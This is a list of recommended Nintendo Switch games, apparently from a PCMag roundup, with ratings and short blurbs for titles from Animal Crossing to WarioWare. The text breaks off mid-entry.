    The Best Games on Every Platform Animal Crossing: New Horizons Animal Crossing: New Horizons4.0 Excellent No game may end up defining 2020 more than Animal Crossing: New Horizons. Nintendo’s adorable life simulator has always had its fans. However, with the real world under lockdown, countless players have flocked to their own virtual islands to find community. Paying a mortgage to a raccoon is a small price to pay for the freedom to relax in your own social life again. Advance Wars 1+2: Re-Boot Camp Advance Wars 1 + 2: Re-Boot Camp 4.0 Excellent Fire Emblem isn't Nintendo's only awesome strategy series. If you prefer soldiers and tanks over knights and horses, check out Advance Wars and its terrific turn-based tactics. This remake includes campaigns from the first two Game Boy Advance games, offering hours upon hours of brilliantly designed missions. You can also design your own maps and play against friends online. Advance Wars 1 + 2: Re-Boot Camp review ARMS ARMS4.0 Excellent ARMS is Nintendo's newest take on the fighting game genre. It combines cartoonish aesthetics, sci-fi weapons, and arm-stretching boxing into an accessible, offbeat fighter with a lot of variety. It's a polished, fun, competitive game that bears more than a passing visual similarity to Splatoon. Though time will tell if ARMS gains any momentum within the esports scene, the game offers plenty of opportunity to swing fists at your friends. Bayonetta 2 Bayonetta 24.5 Excellent Bayonetta 2 is another fantastic game that launched on the wrong system. Years later its initial release, Bayo 2 still stands as one of the best action games out there, and now that it's been ported from the Wii U to the Switch it can get the attention and devotion it deserves. Tight controls, robust challenge, and plenty of style make this stand out as a pinnacle of action games. Bayonetta 3 Bayonetta 34.5 Excellent Just when you thought Bayonetta couldn’t get any more bewitching, PlatinumGames delivers an absolute master class on video game action with Bayonetta 3. Besides Bayonetta’s familiar punches, kicks, and guns, you can further expand her combat options by summoning giant demons and directing their attacks. Meanwhile, the multiversal story is ridiculous, even by Bayonetta standards. Bloodstained: Ritual of the Night Bloodstained: Ritual of the Night4.0 Excellent If Bloodstained: Ritual of the Night's story of a demonic castle and a lone savior sounds incredibly familiar, it should: the game was spearheaded by Koji Igarashi, the big brain behind many revered Castlevania games. Bloodstained is an excellent Castlevania game in everything but name, hitting the same beats Symphony of the Night, Aria of Sorrow, and Order of Ecclesia did. If you're thirsty for a new, enjoyable Castlevania-like game that calls back to before Lords of Shadow rebooted the series and Mirror of Fate completely failed to capture any of its luster, this is the game for you. Bayonetta Origins: Cereza and the Lost Demon 4.0 Excellent Bayonetta Origins: Cereza and the Lost Demon isn’t a hard-hitting, nonstop action game like the main Bayonetta trilogy. Instead, this is a relatively relaxed adventure game full of puzzles and gorgeous storybook visuals. Young witch Cereza teams up with a young demon, Cheshire, to tackle challenges neither could complete alone. Although the combat isn’t quite as complex as in the mainline Bayo games, there’s still plenty of flair to the faerie fights. Bayonetta Origins: Cereza and the Lost Demon review Bravely Default II Bravely Default II4.0 Excellent Modern Final Fantasy games have become their own beasts, but games like Bravely Default II remind us why we fell in love with those classic Square Enix JRPGs. In battle, you can either perform multiple actions at onceor wait to save up for later turns, which opens up many strategic possibilities. On Switch, the diorama world looks more beautiful and nostalgic than ever. Cadence of Hyrule: Crypt of the NecroDancer Cadence of Hyrule: Crypt of the NecroDancer4.0 Excellent Crypt of the NecroDancer was a surprise indie hit in 2015, catching gamers' eyes and ears with its combination of roguelike randomized dungeon exploration with rhythm game beat-keeping. It hit the Nintendo Switch in 2018, and now it's back in a new and much more Nintendo-specific form: Cadence of Hyrule: Crypt of the NecroDancer, a title that injects rhythm game mechanics into The Legend of Zelda. This Switch game seamlessly combines Zelda and Crypt of the NecroDancer, creating a surprisingly accessible and thoroughly enjoyable experience played to the beat of Zelda's classic and music. Cassette Beasts 4.0 Excellent Pokémon doesn't have a monopoly on monster catching. Cassette Beasts is a stylish, indie RPG that puts its own spin on collecting creatures and pitting them against each other in combat. The open world has many quests, the fighting mechanics have the extra depth that experienced players crave, and the story veers off in cool, surreal directions. Most importantly, there are some great monster designs, like ghostly sheep and living bullets. Cassette Beasts review Clubhouse Games: 51 Worldwide Classics Clubhouse Games: 51 Worldwide Classics4.0 Excellent Forget fancy new video games. Sometimes you just want to play chess, solitaire, or one of the other virtual vintage games that make up this classic compilation. Not only is this a convenient way to play some of history’s most enduring games with friends, but Clubhouse Games: 51 Worldwide Classics does a great job educating you on that history, including the fascinating early Hanafuda history of Nintendo itself. Game Builder Garage Game Builder Garage4.5 Excellent If you thought Super Mario Maker was a great way to learn about game development, give Game Builder Garage a spin. This incredibly powerful 3D game creation tool lets you make anything from platformers to racing games to puzzle mysteries. Thorough, friendly tutorials explain the robust “Nodon” coding language, so even novices can create hitboxes and manipulate the Z-axis like pros. Donkey Kong Country: Tropical Freeze Donkey Kong Country: Tropical Freeze4.0 Excellent The Switch has gotten a reputation as a machine for game ports, and there's nothing wrong with that. The Wii U wasn't the massive hit the Wii was, but it still had several excellent games that went underappreciated in their time. Donkey Kong Country: Tropical Freeze is one of them, a sequel to Donkey Kong Country Returns with even more challenge and variety. The Switch version of this game adds Funky Kong Mode, an easier setting and new playable characterthat makes the surprisingly brutal platforming feel a little less punishing. Hades HadesHades takes the punishing and divisive roguelike genre and masterfully twists it into one of the year's most addictive games. Fighting your way out of the Greek underworld with randomly changing skills and weapons feels incredible. The family drama at the game’s core gives you that extra narrative push to keep going. Plus, everyone is smoking hot. Indivisible IndivisibleWhile many role-playing games draw their influences from Western folklore, even RPGs made in Japan, Indivisible carves out a unique identity with a fresh Southeast Asian flavor. The 2D animation is exquisite, as we would expect from the developer of Skullgirls. Gameplay is a mix of nonlinear spaces to explore and enemies to defeat in tactical battles. Of the two types of play, the exploration sections impress us more. In these bits you find your way forward by using an axe to fling yourself up walls or by shooting arrows to blind sentries. That's just more satisfying than the frantic messes the fights, caught awkwardly between turn-based and real-time combat, can turn into.   Kirby's Return to Dream Land Deluxe Kirby’s Return to Dream Land Deluxe4.5 Excellent Kirby’s Return to Dreamland is a traditional, side-scrolling adventure compared to Kirby’s more radical outings. Still, it’s an excellent showcase of what makes even a normal Kirby game irresistible. This Deluxe version enhances the Wii co-op classic with a sweet, new art style; extra powers; and an original epilogue. Kirby’s Return to Dream Land Deluxereview Kirby and the Forgotten Land Kirby and the Forgotten Land4.0 Excellent Kirby and the Forgotten Land finally gives the pink puffball the epic 3D adventure that Mario, Link, and Samus got years ago. Float through the skies in creative levels bursting with secrets. Upgrade familiar powers, such as hammers and swords, into formidable new forms. Or just sit back and marvel at how Nintendo made the post-apocalypse look so cute. Kirby Star Allies Kirby Star Allies4.0 Excellent Kirby games are always fun. Whether they're the simple platformers like Kirby's Adventure or weirdly gimmicky experiences like Kirby's Dream Course, every first-party experience with Nintendo's pink puff ball has been enjoyable. Kirby Star Allies is no different, with a lighthearted campaign filled with colorful friends and abilities, surprisingly challenging extra modes to unlock, and support for up to four players at once. Get on the Friend Train! The Legend of Zelda: Breath of the Wild The Legend of Zelda: Breath of the Wild4.5 Excellent Hyrule is in danger again, and Link must save it. That's been the theme for nearly every Legend of Zelda game, and it's still the case in The Legend of Zelda: Breath of the Wild. The series' basic premise and Link/Zelda/Ganon dynamic are present, but nearly everything else is different. The classic Zelda dungeon-exploration structure is replaced by a huge open world that's filled with destructible weapons, monsters, puzzles, and quests. Breath of the Wild's scope is one previously unseen in the Zelda series, and Nintendo executes the adventure-filled world with aplomb. The Legend of Zelda: Echoes of Wisdom The Legend of Zelda: Echoes of Wisdom - Nintendo Switch, Nintendo Switch – OLED Model, Nintendo Switch Lite 4.5 Excellent The Legend of Zelda: Echoes of Wisdom turns Nintendo's epic franchise on its head in more ways than one. Instead of the swordsman, Link, you play as Princess Zelda. Likewise, you don't directly attack enemies; you summon useful items and foes to aid you on the mission. The game takes the creative, improv spirit of Breath of the Wild and applies it to a classic 2D top-down Zelda adventure with delightful results. Plus, it just looks adorable. The Legend of Zelda: Echoes of Wisdom - Nintendo Switch, Nintendo Switch – OLED Model, Nintendo Switch Lite review The Legend of Zelda: Skyward Sword HD The Legend of Zelda: Skyward Sword HD3.5 Good No Zelda games are terrible, but no game polarizes the fan base quite like Skyward Sword. Fortunately, this HD remaster speeds up the pacing, enhances the graphics, and offers a button-based control scheme if you don’t care for motion controls. The structure feels especially linear in a post-Breath of the Wild world, but Zelda’s origin story is still worth experiencing. The Legend of Zelda: Tears of the Kingdom The Legend of Zelda: Tears of the Kingdom - Nintendo Switch, Nintendo Switch, Nintendo Switch Lite 5.0 Outstanding At launch, it was tough to imagine the Switch ever getting another game as good as Breath of the Wild. But years later, The Legend of Zelda: Tears of the Kingdom delivers everything we could have possibly wanted and more in this direct sequel to one of the greatest games ever made. Exploring the skies and underground caves makes Hyrule more vast than ever. New powers let you break the world apart and rebuild it as you see fit. Tears of the Kingdom is an irresistible, hypnotic adventure, and an absolute must-play for all RPG fans. The Legend of Zelda: Tears of the Kingdom - Nintendo Switch, Nintendo Switch, Nintendo Switch Lite review Lego Star Wars: The Skywalker Saga Lego Star Wars: The Skywalker Saga4.0 Excellent Who knows what the future holds for Star Wars, but Lego Star Wars: The Skywalker Saga provides a terrific toybox take on Episodes I-IX. The Lego recreations of all nine movies gives you plenty to experience as you blast baddies and solve Force puzzles. But what really makes this game so special is how it turns the entire Star Wars galaxy into an open world to explore, whether it’s on colorful planets or through the vastness of outer space in your trusty starfighter. Lego Star Wars: The Skywalker Sagareview Luigi's Mansion 3 Luigi's Mansion 3 - Nintendo Switch Standard Edition What started as a weirdly specific parody of Ghostbusters and Resident Evil has become of one the finest Mario spin-off adventures. Luigi’s spooky journey throughout a haunted hotel is arguably the most visually stunning game on the Nintendo Switch. Along with sucking up ghosts, you can now slam themto death and shoot plungers to pull apart the scenery. Your greatest, and grossest, tool has to be Gooigi. This slimy green doppelgänger expands your puzzle-solving powers and provides an easy option for younger co-op partners. Lumines Remastered Lumines Remastered4.5 Excellent Puyo Puyo Tetris is great for classic, competitive block-dropping, but it's a bit overly perky and anime-ish to really relax to. Lumines Remastered is the ultimate chill-out block-dropper, syncing the mesmerizing pattern matching to dozens of hypnotic electronic and trance tracks. Load it on your Switch, put on your favorite headphones, and space out while you build huge combos. Mario & Luigi: Brothership Mario & Luigi: Brothership - Nintendo Switch, Nintendo Switch – OLED Model, Nintendo Switch Lite 4.0 Excellent Mario & Luigi: Brothership revives a Mario RPG subseries as a grand nautical adventure. The plumbers sail the seas, reconnecting scattered islands and battling foes with familiar, frenetic turn-based combat. On Nintendo Switch, the visuals and animations turn Mario and Luigi into cartoon-like characters. Mario & Luigi: Brothership - Nintendo Switch, Nintendo Switch – OLED Model, Nintendo Switch Lite review Mario + Rabbids: Kingdom Battle Mario + Rabbids: Kingdom Battle4.0 Excellent Before Minions, there were Rabbids, Ubisoft's manic, sublingual, noseless horde spawned from Rayman: Raving Rabbids. Then the weird, bug-eyed, rabbit-like creatures caused havoc in their own game series. Now, they're running around Mario's stomping grounds in Mario + Rabbids: Kingdom Battle. This strategy-RPG combines two cartoonish worlds with satisfyingly deep, XCOM-like gameplay for a very fun and strange experience. It's a combination of styles that work much, much better than you'd expect. Mario + Rabbids Sparks of Hope Mario + Rabbids Sparks of Hope4.0 Excellent Mario + Rabbids Kingdom Battle proved that these two mascots could come together for excellent, approachable tactics gameplay. Sparks of Hope is more of the same, but even better. Equipping Sparks lets you further customize your squad’s strategic abilities. Wide open levels provide entertaining exploration between the skirmishes. Mario Golf: Super Rush Mario Golf: Super Rush4.0 Excellent Leave it to Mario to find a way to make golf games feel fresh again. Mario Golf: Super Rush’s standout gimmick has golfers teeing off all at once, and then physically running across the course to take their next shot. You still have to plan smart strokes, but you also need to keep an eye on the clock. The lengthy, single-player adventure teaches you the ropes before you head online to face real challengers on the green. Mario Kart 8 Deluxe Mario Kart 8 Deluxe4.5 Excellent Mario Kart 8 stood out as the best-looking Mario Kart game yet when it came out on the Nintendo Wii U. Instead of making a new Mario Kart for the Nintendo Switch, Nintendo brought Mario Kart 8 to its new game system. In the process, Nintendo threw in both previously released DLC packs and made some few welcome changes to its multiplayer options, justifying the game's full retail price. Mario Kart 8 Deluxe is the most robust game in the series so far, and with the optional portability of the Switch, it ranks as a must-own title. Mario Strikers: Battle League Mario Strikers: Battle League4.0 Excellent Mario has played many sports throughout the years, but Mario Strikers: Battle League gives us the arcade soccer chaos fans have craved for more than a decade. It features fast-paced action, while allowing for depth and skill should you choose to push yourself. Customize your characters with stat-changing gear. Join online clubs to compete in ongoing seasons. And no one animates the Mario universe with as much style and attitude as the developers at Next Level Games. Mario Strikers: Battle Leaguereview Mario Tennis Aces Mario Tennis Aces4.0 Excellent You don't need to be a sports fan to enjoy Nintendo sports games. If a sport has "Mario" in front of it, it's probably going to be a fun, very unrealistic romp instead of a serious simulation. Mario Tennis Aces is an exciting tennis game not because of any realistic physics, but because of fast, responsive gameplay and strategic mechanics that make matches feel more like rounds in a fighting game than tennis sets. Marvel vs. Capcom Fighting Collection: Arcade Classics Marvel vs. Capcom Fighting Collection: Arcade Classics - Nintendo Switch 4.0 Excellent Marvel vs. Capcom Fighting Collection: Arcade Classics lets you finally relive six legendary 2D fighters starring Marvel superheroes and Capcom icons. From the humble X-Men: Children of the Atom to the over-the-top Marvel vs. Capcom 2, this is vital fighting game history. An art gallery, modern control options, rollback netcode, and the underrated Punisher beat 'em up sweeten the deal. Marvel vs. Capcom Fighting Collection: Arcade Classics - Nintendo Switch review Metal Slug Tactics Metal Slug TacticsMetal Slug Tactics trades the mainline series' fast-paced running and gunning for methodical, turn-based strategy gameplay. Still, it's just as action-packed as ever. Line up your units for devastating sync attacks. Enjoy the beautiful old-school sprite work. Plan your turns, hop into a giant tank, and obliterate foes. Metroid Dread Metroid Dread4.5 Excellent After nearly 20 years, Metroid Dread brings Samus Aran back to her 2D, bounty hunting roots for the true Metroid 5. In it, you explore a dense, dangerous new planet full of powers to pick up and enemies to eliminate. From uncompromising boss battles to terrifying chases, Dread more than lives up to its subtitle. If there's anyone strong enough to take down the terror, it's Nintendo's leading lady. Metroid Prime Remastered 5.0 Outstanding Metroid Prime is one of the best games ever made. It takes Super Metroid’s brilliant exploratory action and perfectly translates it to 3D with immaculate level design and immersive first-person shooting. This remaster, which ventures into the remake territory, includes everything that worked in the original, and ups the presentation to modern, beautiful standards. Plus, you can now play with dual-stick controls. Bring on Metroid Prime 4. Metroid Prime Remastered review Miitopia Miitopia3.5 Good Miis can do more than just play Wii Sports. In Miitopia, you use Nintendo’s cartoon caricatures to cast yourself, friends, and family as heroes and villains in a fast-paced, whimsical role-playing game. Turn yourself into a brave knight, while your buddy supports you as a pop star. The joke can’t quite sustain the whole runtime, but Miitopia is wildly entertaining.   Monster Hunter Stories 2: Wings of Ruin Monster Hunter Stories 2: Wings of Ruin4.0 Excellent If traditional Monster Hunter is just too intense for you, Monster Hunter Stories 2 lets you experience this cutthroat world as a turn-based JRPG. Befriend monsters and take them into battle. Hatch eggs to expand your menagerie. Strategic battles draw upon familiar Monster Hunter concepts. And, of course, Rathalos is here. New Pokemon Snap New Pokemon Snap4.0 Excellent The beloved Nintendo 64 spin-off finally gets the update it deserves. Instead of capturing Pokemon and forcing them to battle, New Pokemon Snap asks you to take beautiful photos of Pikachu and friends in their natural surroundings. The on-rails gameplay feels like a nonviolent version of a light gun game. The gorgeous graphics will inspire you to share your best pics online for the world to see. Nickelodeon All-Star Brawl Nickelodeon All-Star Brawl4.0 Excellent Imagine Super Smash Bros., but instead of playing as video game mascots, you control beloved cartoon characters beating each other senseless. That's Nickelodeon All-Star Brawl. From SpongeBob SquarePants to Ren and Stimpy to the Teenage Mutant Ninja Turtles, the roster covers all eras of Nicktoon nostalgia. Beyond the ironic meme potential, "Nick Smash" features genuinely fantastic gameplay made by a team clearly passionate about this particular form of "platform fighting" games. Nickelodeon All-Star Brawlreview Nintendo Labo Toy-Con 01 Variety Kit Nintendo Labo Toy-Con 01 Variety Kit5.0 Outstanding Labo is a weirder concept than the Switch itself. It's based around building cardboard "Toy-Cons" in which you place the Switch's components to let you do new things with them. It's also surprisingly functional, entertaining, and educational. The Nintendo Labo Variety Kit has all of the parts you need to build several different Toy-Cons like a piano and motorcycle handlebars, and walks you through every step of the process. Just building the Toy-Cons is fascinating, but the Toy-Con Garage mode adds surprisingly robust programming options to let you create your own remote-controlled creations. Nintendo Labo: VR Kit 4.5 Excellent It took over 20 years, but Nintendo finally got over its fear of virtual reality after the disastrous Virtual Boy. The Labo VR Kit lets you build your own VR headset that uses the Nintendo Switch and a set of lenses to create a stereoscopic image, and then insert that headset into different Toy-Con controllers to play a variety of games. That's already a ton of fun for. Add a programming environment on top that lets you create your own 3D games, and you have an impressive package. No More Heroes III No More Heroes III4.0 Excellent No More Heroes III, like the other games in Suda51’s hack-and-slash trilogy, is a punk art game. Sure, some parts may be “bad,” like the technical jank or empty open worlds. But it’s all in service of larger commentary on everything from schlocky movies to wrestling fandom to the video game industry itself. Plus, cutting aliens down to size feels legitimately fantastic, and really that’s what matters.  Penny's Big Breakaway 4.0 Excellent The creators of Sonic Mania deliver a new indie 3D platformer that feels like a forgotten Sega classic. Use your trusty yo-yo to swing and roll through colorful, tightly designed levels that test your momentum control. Bosses and other enemies are sometimes more annoying than fun, but the movement mechanics are a joy to master. Penny's Big Breakaway review Pikmin 3 Deluxe Pikmin 3 Deluxe3.5 Good Pikmin isn’t the most recognizable Nintendo franchise, but the approachable real-time strategy game carries as much magic as Mario and Zelda. This Wii U port offers more missions and ways to control your army of cute plant creatures. The campaign's local, co-op play opens all kinds of new strategies, too. Veterans of previous Pikmin wars may have seen most of this content before, but Pikmin newcomers should absolutely jump into this tiny, tactical, and tactile world. Pikmin 4 Pikmin 44.5 Excellent Pikmin has always been good, but the quirky real-time strategy game has never broken out of its cult status over the past 20 years. Hopefully, that all changes with Pikmin 4. The biggest and best Pikmin game yet, Pikmin 4 gives you new Pikmin to command, a cute and customizable dog companion, and many gorgeous areas to strategically explore whether above ground or in countless caves. The multiplayer could be better, but Pikmin 4 is a top-tier Nintendo game everyone should play. Pikmin 4review Pizza Tower Pizza Tower feels like a fever dream of 1990s cartoons, internet memes, and retro Wario Land games. Don’t let his pudgy exterior fool you. Protagonist Peppino Spaghetti has many incredibly fast and fluid platforming tools, including dashing and wall-running. You’ll need to master those tools to beat levels as fast as possible, without losing your mind. Pokemon Legends: Arceus Pokemon Legends: Arceus3.5 Good Pokemon Legends: Arceus finally gives the Pokemon franchise a long-awaited refresh. Taking place in the distant past of Diamond and Pearl’s Sinnoh region, Arceus lets you capture and study wild Pokemon in a world where humans still fear the creatures. Vast open fields, revamped battle mechanics, and an utterly addictive approach to exploration create the most immersive Pokemon experience yet. Pokemon Let's Go, Pikachu/Eevee! Pokemon: Let's Go, Eevee! 4.0 Excellent If the traditional Pokemon RPGs are still just a bit too complex for you, consider the casual adventures Pokemon Let's Go Pikachu and Let's Go Eevee. This duo remakes the first-generation Pokemon Yellow, with bright, colorful, HD graphics, and a new capture mechanic based on Pokemon Go. In addition, there are trainer battles and turn-based combat for people who dig classic Pokemon. Pokémon Scarlet and Violet Pokémon Scarlet - Nintendo Switch 4.0 Excellent Pokemon Sword and Shield and Pokemon Legends: Arceus experimented with expansive zones, but Pokémon Scarlet and Violet finally turns the monster-catching game into an open-world RPG. As we always suspected, the addictive Pokémon formula works brilliantly when you can go wherever you want, exploring towns and catching whatever monsters you encounter. Lingering technical issues keep it from reaching its full potential, but this is Pokémon's shining future. Pokemon Sword/Shield Pokemon Sword4.0 Excellent Pokemon Let’s Go Pikachu and Eevee were a nice warmup, but Pokemon Sword and Shield are the real home console Pokemon games we’ve been looking forward to playing. Travel across big, open landscapes to capture even bigger Pokemon. New expansions packs in 2020 give trainers even more regions to explore and more Pokemon to battle without having to buy a third version. The Pokedex will be complete before you know it.  Prince of Persia: The Lost Crown 4.5 Excellent Prince of Persia returns to its 2D roots with The Lost Crown, a standout entry in the crowded modern Metroidvania market. Everything just clicks. The massive map is a joy to explore. Clever puzzles make the most of inventive abilities. Deep combat systems allow satisfying expression. Challenging DLC further expands the adventure. And the presentation combines Persian flair with anime exuberance. Prince of Persia: The Lost Crown review Pokemon Unite Pokemon Unite3.5 Good If you’re curious about the MOBA genre, but scared of esports heavy-hitters like Dota 2 and League of Legends, then Pokemon Unite is the perfect place to get started. Two teams of five Pokemon battle each other in real-time to score goals across the map. This free-to-play game is also coming soon to mobile, so you’ll find plenty of aspiring Pokemon masters to challenge. Puyo Puyo Tetris Puyo Puyo Tetris4.5 Excellent Practically everyone in North America has heard of Tetris. Far fewer have heard of Puyo Puyo. Both are block-dropping puzzle games, but while Tetris has been Tetris for decades, Puyo Puyo has had many different tweaks and name changes in attempts to appeal to the west. It came out first as Puyo Pop, then received different licensed incarnations, such as Puzzle Fighter and Dr. Robotnik's Mean Bean Machine. Now, Puyo Puyo is making its mark here, thanks to Sega and a double-billing with Tetris. The pairing results in a title that's plump with game modes, unlockables, and solo and multiplayer options. Red Dead Redemption Red Dead RedemptionGrand Theft Auto put Rockstar Games on the map, but for many the team's true masterpiece is the epic, open-world Western saga known as Red Dead Redemption. John Marston's cowboy odyssey has the scathing tone you'd expect from the developer, but it also has heart and a sense of tragedy. The Nintendo Switch version perfectly maintains the original gameplay experience, from stylish shootouts to riding your horse across the empty desert. It also includes the Undead Nightmare DLC. Finally, a version of Red Dead you can play in a tent under the stars. Rebel Galaxy Outlaw Rebel Galaxy OutlawRebel Galaxy Outlaw has enough action-packed, visually dazzling spaceship dogfights to excite any Star Fox fan. The real joy, however, is in the quieter moments, when you act out your galactic trucker fantasies by carrying cargo from space stations named after Texas towns. Improving your ship is a bit of a grind, but it’s a rewarding one. If you get bored, you can always shoot down pirates—or become one yourself. Rocket League Rocket LeagueRocket League is soccer, with remote controlled cars and funny hats. It's amazing how compelling a game can be when the entire point of it is to use a car to knock a ball into a goal, but Rocket League nails it. Wild physics, colorful visuals, and simple game types you can keep coming back to while challenging friends and strangers make this one of the best pseudo-sports games on the Switch. Shovel Knight: Treasure Trove Shovel Knight: Treasure TrovePlatforming excellence comes to the Nintendo Switch courtesy of Yacht Club Games' Shovel Knight: Treasure Trove. This downloadable package includes the original Shovel Knight, one of 2014's top titles, as well as all the previously released DLC including the Plague of Shadows and Specter of Torment campaigns. If you long for some retro, 2D action, Treasure Trove a a game that you should not miss. Splatoon 3 Splatoon 34.0 Excellent Splatoon 3 isn't much different than Splatoon 2. However, no other online team-based shooter delivers an experience quite like this. Inking the ground, splatting opponents, and transforming from squid to kid never felt this good. The wealth of solo, cooperative, and competitive modes will keep you busy. Keep the party going with the excellent, roguelike DLC Side Order. Splatoon 3review Street Fighter 30th Anniversary Collection Street Fighter 30th Anniversary CollectionStreet Fighter has been the biggest name in fighting games for decades, and Capcom is proud of that fact. While it really got going with Street Fighter II: The World Warrior, the Street Fighter 30th Anniversary Collection lets you play the original Street Fighter in all of its genre-building glory. And, after you realize how bad that first attempt was, you can play the much better sequels like Super Street Fighter II, Street Fighter Alpha 3, and Street Fighter III: Third Strike. You're looking at a dozen games in this collection, with loads of extra content like soundtracks and sprite data. Streets of Rage 4 Streets of Rage 4Streets of Rage 4 pounds life back into the dead sidescrolling beat ‘em up genre. The gameplay may not have progressed that much since Sega’s trilogy in the 1990s, but taking down hordes of goons with your fists has never looked better thanks to a thoroughly modern illustrated art style. A risky new mechanic that burns health to power special moves, unless you avoid getting hit, adds some fighting-game flair.  Super Bomberman R Super Bomberman R3.5 Good Bomberman's return to console gaming was one of the most surprising moments in the Nintendo's January 2017 Switch game showcase. Considering that the little guy's now the property of Konami, a company that's more known for killing P.T. and warring with Metal Gear maestro Hideo Kojima than making video games, it was shocking to see Super Bomberman R announced as a Nintendo Switch launch title. Thankfully, this newest entry in the beloved, bomb-tossing franchise keeps the series' simple and addicting core gameplay intact, and adds tons of modes, collectible items, and characters to keep things fresh. Super Mario 3D All-Stars Super Mario 3D All-Stars3.5 Good This classic Mario collection combines Super Mario 64, Super Mario Sunshine, and Super Mario Galaxy. They may not have received the radical visual overhaul of the original Super Mario All-Stars, but these are still three of the finest 3D platformers ever made—now playable in HD and on the go. Nintendo says this collection is a limited release, so get it while you can. Super Mario 3D World + Bowser's Fury Super Mario 3D World + Bowser's Fury4.5 Excellent Super Mario 3D World seamlessly blends the free-roaming, open-ended platforming of Mario 3D’s adventures with the concentrated multiplayer mayhem of his latest 2D romps. It was great on Wii U, and now it's even better on Nintendo Switch. However, this package’s real star is Bowser’s Fury, an ambitious spin-off that reimagines what an open-world Mario game can be. Super Mario Bros. Wonder Super Mario Bros. Wonder - Nintendo Switch 4.5 Excellent In the beginning, all Super Mario games were wonderful 2D sidescrollers that dazzled us with their sheer imagination. But as Mario set his sights on 3D heights, the New Super Mario Bros. series turned 2D Mario into a safe and bland nostalgia franchise. No more! Super Mario Bros. Wonder fills 2D Mario to the brim with whimsy, creativity, and joyful confusion. Turn levels into psychedelic dreamscapes! Customize your abilities! Compete against friends online! Transform into an elephant! You can do all of this and more in Super Mario Bros. Wonder. Super Mario Bros. Wonder - Nintendo Switch review Super Mario Maker 2 Super Mario Maker 24.5 Excellent Super Mario Maker 2 is a welcome update to the original Super Mario Maker. It adds a new skin, new themes, and plenty of new tools for making more creative and challenging Mario levels. You can create levels based on the graphics and mechanics of Super Mario Bros., Super Mario Bros. 3, Super Mario World, and New Super Mario Bros., just like in the previous Super Mario Maker. These levels can use one of 10 different themes: Ground, Sky, Underground, Forest, Underwater, Ghost House, Desert, Airship, Snow, and Castle. Sky, Forest, Desert, and Snow are new to Super Mario Maker 2. For more variety, you can toggle each theme to its nighttime variant, which adds unique twists to the gameplay. And, of course, you can share your creations online. Super Mario Odyssey Super Mario Odyssey5.0 Outstanding In Super Mario Odyssey, the heroic plumber returns to open-world game design for the first time since the incredible Super Mario 64. Though Odyssey isn't as technically groundbreaking as its predecessor, the action-platformer is packed to the brim with hat-tossing combat. Yes, hat tossing. This time around, Mario has a new friend, Cappy, who lets Mario dispatch enemies with the flick of the wrist. And, even better, Mario can assume the identity of an enemy, gaining its abilities, by plopping Cappy on the foe's head. Super Mario RPG Super Mario RPG - Nintendo Switch, Nintendo Switch Lite, Nintendo Switch 4.0 Excellent Forget Paper Mario or Mario and Luigi. The original Super Mario RPG, a collaboration between Nintendo and Square Enix, first showed us that Mario’s charms could translate to a Final Fantasy-style adventure. This faithful remake offers gorgeous new graphics and increased accessibility. At last, find out who Geno is. Super Mario RPG - Nintendo Switch, Nintendo Switch Lite, Nintendo Switch review Super Monkey Ball Banana Mania Super Monkey Ball Banana Mania4.0 Excellent Only video games can capture the simple pleasures that come from racing monkeys inside balls. Super Monkey Ball Banana Mania remasters hundreds of classic stages from Sega’s obstacle course series in a single, cool package. Don’t let the bright colors and friendly monkey faces fool you. Rolling your monkey to the goal demands an expert understanding of the game’s unforgiving physics. If you get too frustrated, take a break with Banana Mania's wacky, multiplayer mini-games. Super Smash Bros. Ultimate Super Smash Bros. Ultimate4.5 Excellent Super Smash Bros. Ultimate has everything a fan of Nintendo’s crossover mascot fighting game could want. A faster pace better for competitive play. Every single character who has ever appeared in the series, including third-party icons such as Banjo-Kazooie, Cloud Strife, and Solid Snake. There's a new single-player mode chock-full of even more fan service. The theme song even has lyrics now.  Tactics Ogre: Reborn Tactics Ogre Reborn4.0 Excellent The original Tactics Ogre enthralled fans in 1995 thanks to its deep strategy and strong narrative. If you missed out the first time, Tactics Ogre: Reborn gives you another chance to check out this lost classic, the prelude to Final Fantasy Tactics. Just don’t expect hugely revamped graphics. Telling Lies Telling LiesHer Story was a test for the kind of interactive story game developer Sam Barlow could pull off with just FMV clips and a fake computer interface. Telling Lies is the Aliens to Her Story’s Alien. Instead of just investigating one woman’s interviews, you follow four different characters. Tracing a nonlinear mystery across so many different threads can get overwhelming. Fortunately, Hollywood actors Logan Marshall-Green, Alexandra Shipp, Kerry Bishé, and Angela Sarafyan make the clips compelling watches in their own right. Besides, we’re all pretty used at communicating through video chat these days.  Triangle Strategy Triangle Strategy4.0 Excellent A tactical follow-up to the gorgeous Octopath Traveler, Triangle Strategy is a luxurious strategy role-playing game that rewards your patience. Soak in the atmosphere on the land. Become invested in the characters and political intrigue. Methodically think through every option during turn-based battles and feel like an absolute strategic genius.  Trombone Champ Trombone ChampRhythm games usually make you feel like an ultra-cool rock god. Not Trombone Champ. This zany title embraces the goofy charm of its titular instrument, delivering an experience that is both awesome and awkward. The purposefully bumbling controls make each song sound like a confused elephant putting on a concert, an effect that's multiplied in local multiplayer. A light progression system unlocks famous trombone players like baseball cards while trying to solve a sinister riddle. The game is also available on PC, but the Switch version deserves props for its hilarious motion controls that take the trombone simulation to the next level. Tokyo Mirage Sessions #FE Encore Tokyo Mirage Sessions #FE Encore3.5 Good While you wait for Persona 5 to come to the Nintendo Switch, Tokyo Mirage Sessions #FE, a late Wii U port, is the next best thing. This bewildering crossover between Fire Emblem and Shin Megami Tensei has players entering the entertainment industry of Japan’s stylish Shibuya and Harajuku districts. Of course, you also do battle against demons by summoning Fire Emblem characters through the power of song. A streamlined battle system and pop music tone should delight players who don’t even care about anime RPGs.  Unicorn Overlord 4.5 Excellent As a Vanillaware game, we’re not surprised that Unicorn Overlord has an unbelievably beautiful illustrated aesthetic. However, the game backs up its looks with deeply strategic role-playing gameplay that requires tactical thinking. Ogre Battle fans, this one’s for you. Unicorn Overlord review Void Bastards Roguelikes can be a polarizing genre as their repetitive nature, random elements, and punishing difficulty threaten to make the entire experience a waste of time. Void Bastards avoids this trap with a core gameplay loop that’s a joy to repeat and an addictive sense of progression stringing you along the whole time.Each new spaceship you raid is basically a tiny comic book-styled System Shock level with spooky enemies to shoot, machinery to hack, character traits to manage, and equipment to salvage. Use that equipment to construct permanent new weapons and perks that make you eager to start another raid. Our journey across the galaxy stretched on for hours because it’s so easy to say “just one more piece of loot.”Note that Void Bastards is published by Humble Bundle, which is owned by PCMag’s parent company, Ziff Davis. WarioWare: Get It Together WarioWare: Get It Together4.0 Excellent WarioWare is one of Nintendo’s best and most shockingly self-aware 